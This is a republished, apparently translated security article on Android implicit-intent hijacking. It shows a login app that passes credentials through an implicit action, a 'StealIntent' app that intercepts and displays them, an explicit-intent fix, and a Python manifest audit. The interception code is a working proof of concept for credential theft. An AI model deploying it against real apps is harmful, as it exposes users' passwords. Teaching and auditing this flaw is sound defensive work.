Android Security: Intent
Source: Internet  Published by: 中文学位论文数据库  Editor: 程序博客网  Time: 2024/06/02 01:44
Original: http://www.sectop.com/?p=187
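1. Introduction to intents
In Android, intents are mainly used to pass information. When an intent is identified implicitly (with setAction), the receiver uses that action to receive the message.
If the intent does not explicitly specify which receivers are permitted to receive it, a malicious app that declares the same action can obtain the intent's contents, which leads to data leakage.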
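2. Example
An intent can be delivered to an activity, a service or a broadcast receiver with the startActivity, startService and sendBroadcast methods respectively.
The example below uses activities.
SendIntent is the legitimate app and has two activities: LoginActivity is the login screen, and MainActivity displays the post-login screen and the submitted intent data.
SendIntent AndroidManifest.xml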
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.xiaod.SendIntent"
    android:versionCode="1"
    android:versionName="1.0">
    <uses-sdk android:minSdkVersion="8" />
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:name=".LoginActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".MainActivity"
            android:label="Main">
            <intent-filter>
                <action android:name="com.xiaod.SendIntent.action.main" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>
    </application>
</manifest>
LoginActivity.java
package com.xiaod.SendIntent;

import android.app.Activity;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.view.View.OnClickListener;
import android.widget.Button;
import android.widget.EditText;

public class LoginActivity extends Activity {
    private EditText et_user;
    private EditText et_pwd;
    private Button btn_login;

    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.login);
        et_user = (EditText) findViewById(R.id.et_user);
        et_pwd = (EditText) findViewById(R.id.et_pwd);
        btn_login = (Button) findViewById(R.id.btn_login);
        btn_login.setOnClickListener(new OnClickListener(){
            @Override
            public void onClick(View v) {
                // TODO Auto-generated method stub
                Intent m_intent = new Intent();
                m_intent.putExtra("username", et_user.getText().toString());
                m_intent.putExtra("password", et_pwd.getText().toString());
                m_intent.setAction("com.xiaod.SendIntent.action.main");
                m_intent.addCategory(Intent.CATEGORY_DEFAULT);
                startActivity(m_intent);
            }
        });
    }
}
StealIntent is the malicious app. It eavesdrops on the intent that LoginActivity in the SendIntent app sends to MainActivity.
StealIntent AndroidManifest.xml
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.xiaod.StealIntent"
    android:versionCode="1"
    android:versionName="1.0">
    <uses-sdk android:minSdkVersion="8" />
    <application android:icon="@drawable/icon" android:label="@string/app_name">
        <activity android:name=".StealIntentActivity"
            android:label="@string/app_name">
            <intent-filter>
                <action android:name="com.xiaod.SendIntent.action.main" />
                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </activity>
    </application>
</manifest>
StealIntentActivity.java
package com.xiaod.StealIntent;

import android.app.Activity;
import android.os.Bundle;
import android.widget.Toast;

public class StealIntentActivity extends Activity {
    /** Called when the activity is first created. */
    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.main);
        Toast.makeText(getBaseContext(),
                "username: " + this.getIntent().getStringExtra("username") +
                "\npassword: " + this.getIntent().getStringExtra("password"),
                Toast.LENGTH_SHORT).show();
    }
}
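After the login button is tapped in SendIntent, StealIntent also receives the data sent in the intent.
3. Solution
Do not identify the intent by action; explicitly specify the package and the handling class that the intent is sent to.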
Intent m_intent = new Intent();
m_intent.putExtra("username", et_user.getText().toString());
m_intent.putExtra("password", et_pwd.getText().toString());
m_intent.setClassName("com.xiaod.SendIntent", "com.xiaod.SendIntent.MainActivity");
startActivity(m_intent);
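The condition that makes the implicit intent above interceptable can be checked statically. The following is an added example, not code from the original article: a Python audit that parses the article's two manifests (condensed here) and reports custom actions claimed by intent filters in more than one package. The function names custom_action_filters and shared_actions are assumptions of this example.

```python
import xml.etree.ElementTree as ET

NS = "{http://schemas.android.com/apk/res/android}"
COMPONENTS = ("activity", "service", "receiver")

# The article's two manifests, condensed to the attributes the check reads.
SEND = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.xiaod.SendIntent">
 <application>
  <activity android:name=".LoginActivity"><intent-filter>
    <action android:name="android.intent.action.MAIN"/>
    <category android:name="android.intent.category.LAUNCHER"/></intent-filter></activity>
  <activity android:name=".MainActivity"><intent-filter>
    <action android:name="com.xiaod.SendIntent.action.main"/>
    <category android:name="android.intent.category.DEFAULT"/></intent-filter></activity>
 </application></manifest>"""
STEAL = """<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.xiaod.StealIntent">
 <application>
  <activity android:name=".StealIntentActivity"><intent-filter>
    <action android:name="com.xiaod.SendIntent.action.main"/>
    <category android:name="android.intent.category.DEFAULT"/></intent-filter></activity>
 </application></manifest>"""

def custom_action_filters(manifest_xml):
    """Map each non-platform action to the components whose filters accept it."""
    root = ET.fromstring(manifest_xml)
    pkg = root.get("package")
    found = {}
    for tag in COMPONENTS:
        for comp in root.iter(tag):
            for action in comp.iter("action"):
                name = action.get(NS + "name") or ""
                if name and not name.startswith("android."):
                    found.setdefault(name, []).append(pkg + "/" + comp.get(NS + "name"))
    return found

def shared_actions(*manifests):
    """Custom actions that components in more than one package would resolve."""
    merged = {}
    for manifest in manifests:
        for action, comps in custom_action_filters(manifest).items():
            merged.setdefault(action, []).extend(comps)
    return {a: c for a, c in merged.items()
            if len({x.split("/")[0] for x in c}) > 1}

if __name__ == "__main__":
    for action, comps in shared_actions(SEND, STEAL).items():
        print(action, "->", comps)
```

An action reported here is one where an implicit startActivity call can resolve outside the sender's own package; the setClassName fix removes the dependency on action matching altogether.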